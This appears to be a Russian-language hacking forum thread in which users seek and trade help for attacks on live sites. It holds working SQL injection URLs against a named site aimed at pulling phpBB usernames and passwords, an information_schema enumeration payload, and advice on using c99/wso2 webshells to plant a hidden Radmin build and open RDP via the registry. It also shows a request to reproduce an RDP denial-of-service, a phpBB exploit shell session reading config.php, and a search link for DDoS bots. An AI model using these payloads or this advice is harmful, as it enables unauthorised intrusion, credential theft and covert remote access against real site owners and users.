вобщем трабла... есть два путя) например http://exaple.com/gg/ и http://exaple.com/forum/ Вобщем нашел пассивную xss в каталоге gg. Выводит алерт с куками только в сафари и в ослике. в опере выводит пустой алерт... встречаюсь с этой шнягой первый раз. в чем проблема?
Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_ phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--
http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,2,3,4,5+from+phpbb3_users-- не катит (( Знающие помогите плиз.
там 5-я версиа БД тебе лень Сипт зАпустить и узнать какая там табелка и какие там таблички или тебе нравится надоедать вопросами на которые уже 100000 раз отвечали и простой поиск по форуму тебе даст на все ответ... Database Version: 5.0.45 Database name: ege_site User name: site_view@localhost
Не знаю что под словом "сипт" ты имеешь ввиду. Но information schema tables там не работает. add//Sory работает 2. Я искал на форуме, но кроме парочки дефолтных таблиц и куча битых атачей ничего не нашол.
SIPT Это прога для работа с SQL инекциями. а почему не работает information_schema? а это что? http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+18,1 перебирайте лимитом и ищите нужную вам базу, потом нужную вам колонку. и читайте документацию больше, тут её очень и очень много
Бывает опытные админы составляют такие скрипти, например видел на одном хостинге, которые создавали пользователя и т.д, не помню на чем, .sh или пхп или перл, ето так для примера, суть не в етом. Ищешь, если достуны на запись, вставляешь свой код, а дальше по обдстановке что тебе нужно, например: чмоднуть или стянуть шедов
имеется веб шелл на (windows server 2003/safe mode-off) имею права на чтение/запись но нет доступа к консоли (нет прав на исполнение) моя цель поднять radmin (hide сборка)
По моему в с99shell да и в других шеллах права на консоль системные? То есть через шелл права полные?
имею права на папки (drwxrwxrwx) могу свободно перемещатся по дискам коих там 2 но консоль не воспринимает команды юзал (с99 и wso2 от Orb) никак не получается выполнить залитый radmin
по твоему правильно но тут по факту не так... ps уже заливал и поднимал radmin на виндах через шелл все было гладко а щас гдето камень...
RDP сначало поставь. А потом уже радмин открывай. Через system() в реестре открываешь порт. Потом коннектишься через mstsc - инсталишь радмин.
StarFire, а вот возьми другой шелл,к примеру р57, и посмотри - есть ли сейф-мод, а лучше - посмотри пхпинфо.
Здравствуйте господа! Хочу спросить у вас у хацкеров прожженных на днях просканил один сервак пауком версия 6.50 он мне выдал такую багу: порт 3389/tcp сервис RDP - Terminal Service Client состояние: <работает> найдена уязвимость DoS-атака (компьютер сейчас находится в стадии перезагрузки) Как мне локально реализовать ещё раз такую DoS-атака, может софт, какой есть, может самому как-то можно запрос сконфигурировать. Как ваще эта атка реализуется простой Dos на указанный порт или как. Зарания всем благодарин. p.s просьба не пинать ламера ушастого
Подскажите плиз. есть форум 2.0.15 phpbb. запустил эксплоит вот этот http://www.governmentsecurity.org/forum/index.php?showtopic=15383 при запуске появилась вот: Code: /zero.pl http://site.com/viewtopic.php?t=9 site.com - 80 - viewtopic.php?t=9 Shell> ls -la Shell> cat config.php Shell> и на любую др. команду серв не отвечает. что может быть подскажите плиз. если надо вот
http://www.google.ru/search?hl=ru&q=Ddos+bot&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=